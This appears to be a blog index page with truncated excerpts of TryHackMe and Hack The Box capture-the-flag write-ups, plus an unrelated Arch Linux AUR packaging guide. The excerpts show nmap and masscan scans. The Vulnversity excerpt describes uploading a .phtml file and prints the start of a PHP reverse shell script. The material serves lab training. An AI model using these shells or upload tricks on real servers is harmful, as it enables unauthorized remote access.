TryHackMe - Kenobi

[Task 1] Deploy the vulnerable machine Set up a bash environment variable export IP=KENOBI-IP NOTE: where KENOBI-IP is shown throughout this writeup, this refers to the TryHackMe server IP. Make sure there is a connection to the THM network ping $IP -c 3 PING KENOBI-IP (KENOBI-IP) 56(84) bytes of data. 64 bytes from KENOBI-IP: icmp_seq=1 ttl=63 time=43.3 ms 64 bytes from KENOBI-IP: icmp_seq=2 ttl=63 time=43.9 ms 64 bytes from KENOBI-IP: icmp_seq=3 ttl=63 time=43.1 ms --- KENOBI-IP ping statis...

TryHackMe - Blue

Prerequisite $ export IP=THM_VPN_IP TASK 1 - RECON 1. Scan the machine The command below runs the nmap scan and writes the output, in all formats, to a portScan directory. $ sudo nmap -sC -sV -vvv -oA ./portScan/nmap-initial $IP Nmap scan report for 10.10.0.135 Host is up, received echo-reply ttl 127 (0.050s latency). Scanned at 2020-04-12 12:48:35 BST for 137s Not shown: 991 closed ports Reason: 991 resets PORT STATE SERVICE REASON VERSION 135/tcp open msrpc syn-ack ttl 127 Mi...

TryHackMe - Vulnversity - Privilege Escalation (Task 5)

This post mainly focuses on Task 5 - Privilege Escalation. To start Task 5, we need to ensure the end of Task 4 was completed correctly; therefore, upload the suggested exploit with an extension of .phtml, for example pe.phtml, to the server via the upload page (http://<ip>:3333/internal); below is the source code of the exploit. <?php set_time_limit (0); $VERSION = "1.0"; $ip = 'IP ON TRYHACKME NETWORK (tun0)'; // CHANGE THIS $port = 1234; // CHANGE THIS $chunk_size = 1400;...

Hack The Box - Devel

Box Details OS DIFFICULTY POINTS Windows EASY 20 ENUMERATION Initial Port Scanning masscan COMMAND masscan -p1-65535,U:1-65535 10.10.10.5 --rate=1000 -e tun0 -oG masscan-Blue RESULT # Masscan 1.0.5 scan initiated Tue Sep 10 14:08:54 2019 # Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;) Host: 10.10.10.5 () Ports: 80/open/tcp//// Host: 10.10.10.5 () Ports: 21/open/tcp//// # Masscan done at Tue Sep 10 14:12:36 2019 nmap Ports for nmap scanning: 80 21...

Hack The Box - Blue

Box Details OS DIFFICULTY POINTS Windows EASY 20 ENUMERATION Initial Port Scanning masscan To speed things up I am going to run masscan to get the initial port availability. COMMAND masscan -p1-65535,U:1-65535 10.10.10.40 --rate=1000 -e tun0 -oG masscan-Blue RESULT # Masscan 1.0.5 scan initiated Sun Sep 8 08:11:45 2019 # Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;) Host: 10.10.10.40 () Ports: 135/open/tcp//// Host: 10.10.10.40 () Ports: 49154/open/tcp///...

Updating an Existing AUR Package File for Arch Linux

Flag the Current AUR Package as out-of-date Log in to the AUR website and flag the current package as out-of-date to ensure everyone is aware of the package status. Download the Latest Version of the PKGBUILD File As an example, when using the yay AUR helper, execute the following command to download the latest version of the PKGBUILD file. $ yay -G NAMEOFPKG Update the Relevant Elements of the PKGBUILD File For example, update the version number via the pkgver variable. Generate All CHECKS...